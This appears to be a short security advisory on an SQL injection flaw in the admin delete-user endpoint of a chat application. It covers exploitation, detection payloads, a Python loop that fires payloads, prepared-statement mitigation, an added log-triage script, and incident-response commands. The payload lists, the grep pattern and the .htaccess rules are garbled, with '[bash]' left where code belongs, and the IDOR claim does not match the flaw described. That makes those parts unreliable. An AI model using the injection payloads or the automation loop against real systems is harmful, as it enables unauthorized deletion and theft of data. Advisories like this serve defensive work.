The vulnerability (CVE-2025-0171) in Code-Projects Chat System 1.0 allows remote attackers to execute arbitrary SQL queries via the `id` parameter in /admin/deleteuser.php. The application fails to sanitize user-supplied input before concatenating it into SQL statements, enabling classic SQL injection. Attackers can manipulate the `id` parameter to inject malicious SQL payloads, potentially leading to unauthorized data access, modification, or deletion. The flaw stems from insecure direct object reference (IDOR) combined with improper input validation.
DailyCVE Form:
Platform: Code-Projects Chat
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/03/2025
What Undercode Say:
Exploitation:
POST /admin/deleteuser.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

id=1' OR 1=1--
Detection (SQLi Payloads):
1' UNION SELECT 1,2,3,4--
1' AND (SELECT 1 FROM users WHERE username='admin')--
Mitigation:
// Use prepared statements: the id value is bound as an integer and never parsed as SQL
$id = (int) $_POST['id'];
$stmt = $conn->prepare("DELETE FROM users WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
Log Analysis (WAF/IDS):
grep "deleteuser.php.id=.[bash]" /var/log/apache2/access.log
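Added example (not part of the original advisory): a log triage that uses an allowlist instead of payload signatures, flagging any request to /admin/deleteuser.php whose `id` is not a plain integer. It assumes the Apache combined log format. Because access logs do not record POST bodies, POST requests like the one shown under Exploitation are reported separately as unverifiable, to be correlated with WAF or application logs. The sample lines, the `triage` function and its names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Mar/2025:10:00:01 +0000] "GET /admin/deleteuser.php?id=12 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Mar/2025:10:00:07 +0000] "GET /admin/deleteuser.php?id=1%27%20OR%201=1-- HTTP/1.1" 500 0 "-" "curl/8.0"
203.0.113.9 - - [04/Mar/2025:10:00:09 +0000] "POST /admin/deleteuser.php HTTP/1.1" 200 0 "-" "curl/8.0"
198.51.100.2 - - [04/Mar/2025:10:01:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# client ip, method, request target, status code
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
ENDPOINT = "/admin/deleteuser.php"
NUMERIC_ID = re.compile(r"[0-9]{1,10}")  # the only shape a user id should have


def triage(log_text):
    """Return (suspicious, unverifiable) lists for requests to ENDPOINT.

    suspicious:   (client_ip, decoded id value) where id is not a plain integer
    unverifiable: (client_ip, status) for POSTs whose id travels in the body
    """
    suspicious, unverifiable = [], []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        if url.path != ENDPOINT:
            continue
        # parse_qs URL-decodes values; keep_blank_values so "id=" is still seen.
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        bad = [v for v in ids if not NUMERIC_ID.fullmatch(v)]
        if bad:
            suspicious.append((ip, bad[0]))
        elif method == "POST" and not ids:
            # The request body is not in the access log, so id cannot be checked here.
            unverifiable.append((ip, status))
    return suspicious, unverifiable


if __name__ == "__main__":
    hits, blind = triage(SAMPLE_LOG)
    print("non-numeric id:", hits)
    print("POST, body not logged:", blind)
```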
Patch Verification:
curl -X POST -d "id=1'" http://target.com/admin/deleteuser.php | grep "SQL syntax"
Exploit Automation (Python):
import requests

payloads = [bash]
for payload in payloads:
    r = requests.post("http://target.com/admin/deleteuser.php", data={"id": payload})
    if "error" in r.text:
        print(f"Vulnerable to: {payload}")
Protection (.htaccess):
RewriteCond %{QUERY_STRING} [bash]
RewriteRule ^admin/deleteuser.php - [bash]
Database Hardening:
REVOKE DELETE ON users FROM 'chat_app'@'localhost';
Incident Response:
# Isolate affected system
iptables -A INPUT -p tcp --dport 80 -j DROP
# Back up logs
tar -czvf /var/log/chat_incident.tar.gz /var/log/apache2/
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-0171
Extra Source Hub:
Undercode